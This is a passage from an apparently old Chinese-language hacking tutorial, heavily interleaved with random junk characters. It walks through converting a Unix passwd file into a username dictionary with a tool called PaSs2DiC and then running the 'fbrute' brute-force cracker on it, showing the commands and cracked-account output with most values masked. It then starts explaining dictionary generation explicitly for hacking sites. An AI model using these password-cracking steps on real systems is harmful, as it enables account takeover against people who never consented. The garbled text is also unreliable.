/ G @. _8 j5 h$ K: bThis tool will: + f6 S; t" F: H: j# X5 d" U* e3 ]0 J& z, n# u
[1] Load PASSWD file and convert it to only username text file ( T l* q- {# R% f1 q' L( q, V6 J[2] Write the file to a dictionary file you choise for target5 ^9 n* n6 }; s1 x6 e0 `& B* ^
* ^: e' y/ p, N; n& K! sYour Source PASSWD File Name: passwd4 W- R8 B. U) {4 z
Your Target Dictionary Name: dic.cfe$ R: ?' D* g' h. E
2 u( f: @% d# p
PaSs2DiC Author: James Lin E-Mail: fetag@stsvr.showtower.com.tw . l. {+ e! H' s4 [4 gFETAG Software Development Co: http://www.showtower.com.tw/~fetag " j) L# U& h2 m4 Q . M) Q9 @& v/ g3 FC:\hack>( {. P2 i' v2 i8 C2 f# A
9 ^3 f/ ?4 x0 L3 q/ c, H" x(這樣就好了 ! 自動(dòng)產(chǎn)生的檔案會(huì)放在 dic.cfe 這個(gè)檔案中, 咱們跑一下 Brute Force看看!)8 r& P$ P0 T, c; B" c4 i
9 h- } H+ G% `4 t) a/ ]0 |' z+ h; P
d& D4 e' M+ M
C:\hack>fbrute passwd @dic.cfe& Y! n$ t- e6 Z+ R
& s+ e+ G7 `4 h0 g2 p& n
BRUTE!, Unix Brute Force Hacking Routine. v2.0 7 `$ p/ o2 o( ]; X7 @Copyright (C) 1990, Prometheus. DOS-fastcrypt made available by sir hackalot.6 `; N' G0 o, y1 {9 q
闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡 " U! v/ D# J8 O: `9 @ # e9 {5 ~, K o# K+ j! ]! z " Q4 S3 y5 I! u2 u* Y( \% T1 ]: s& aAttempts/Hits: 5184/9 $ M; M/ j# F5 G& e& I, e * Z5 k9 G7 H; d9 I9 r: n) ]5 I8 P! w- m# A& W! f0 f: z) j$ L2 L( k3 c
Taking list input from dic.cfe8 ~/ C, _3 ?5 F) N$ w# o$ I( X
Beginning search of passwd for password: xxx $ P. V) {6 {7 X# R4 ]" O# U* U. E9 `. o
Match for password xxxxxx found! Username: xxxxxx4 Z0 G9 o- i4 h1 K) _5 e9 M
Match for password xxxxx found! Username: xxxxx 1 g& ~$ M2 P8 B# U0 a# h# iMatch for password xxx found! Username: xxx * Z( ~2 ^1 z. S8 M9 U8 }, B; N; HMatch for password xxxxxx found! Username: xxxxxx : I2 v# V( ?0 GMatch for password xxxxxx found! Username: xxxxxx & J( P- c6 l T1 i" c% G8 gMatch for password coffee found! Username: coffee - Z2 ?/ O e6 |, Z9 d( ?Match for password xxxxxxx found! Username: xxxxxxx0 X, ]2 T; c% R+ O
Match for password xxx found! Username: xxx 6 N8 P7 N5 Y4 w' g ?, iMatch for password xxxx found! Username: xxxx 4 C' a/ T5 y9 b$ {# ?2 g5 B; ^- i7 K) F/ Y! x& \
Done. / O2 U# u; G3 P0 u / o7 n [; `& b5 V$ O3 R5 DC:\hack> $ v8 P0 b; g3 k; a9 X+ q6 m4 O& ^! U2 Q% S
看! 除了 coffee 外還是有許多人使用與 ID 相同的字作為密碼, 實(shí)在是....@#$%^...&*因某些關(guān)系所以其它部份要被 "馬賽克" 起來, 請(qǐng)各位讀者見量!2 r H7 p" r( k3 t; R
- s$ }5 O9 _$ K" c' s# m6 B
**** 再談密碼 ****, N r1 k W( j/ ]% Y0 i
4 `3 W9 [5 n _; Z+ H$ a" J+ T$ J看了以上的破解示范, 就可以了解到許多人還是對(duì)於 "密碼" 這東西不是很有 "密碼"的觀念, 人就是那麼的懶, 隨便設(shè)定一個(gè)好記的, 但是這種密碼確是最不安全的, 上次我們談到如何用) F, _* d+ f( g7 F$ y
QBasic 來設(shè)計(jì)一個(gè)自動(dòng)產(chǎn)生密碼的小程式, 相信對(duì)許多人有很大的幫助,底下我們?cè)賮頊\顯的介紹一下字母密碼的產(chǎn)生方法, 相信對(duì)於你在 Hack 某站會(huì)有更大的幫助.3 o8 z* Q" N, _
t) g, Z8 c W L" A. c7 y3 i
事情的開始是有一位網(wǎng)友 mail 給我, 問我字典檔要如何寫程式來 "自動(dòng)擴(kuò)大",而讓我有了寫這一段的想法, 現(xiàn)在我就針對(duì)這位網(wǎng)友的問題作一個(gè)更詳細(xì)的說明 (因已簡(jiǎn)短回信答覆),并且寫出來讓大家了解一下, 當(dāng)然我們的示范還是使用 QBasic, 因?yàn)檫@是最容易找到的程式了,而且語(yǔ)法大家也可能會(huì)比較熟悉一點(diǎn), 如果我使用 VB 或 C 來寫, 可能有些人只會(huì)拿去用,而不會(huì)去修改或者寫個(gè)好一點(diǎn)的出來!* r" E2 @- @5 i/ Z. ^" U9 h
9 K: v. d& f* W0 [, @
先說明一下原理好了: 我們所要作的程式是一個(gè)自動(dòng)產(chǎn)生字典檔的程式,所以我們要了解字的字母排列到底有哪些方法可循?? 我們先舉幾個(gè)簡(jiǎn)單的單字出來比較看看: 9 H5 I7 u- h2 Y) e% C Q( D$ M6 l2 @ l$ l
[1] apple [2] guest [3] james [4] superman [5] password % X1 \8 [$ y2 n7 P" }+ v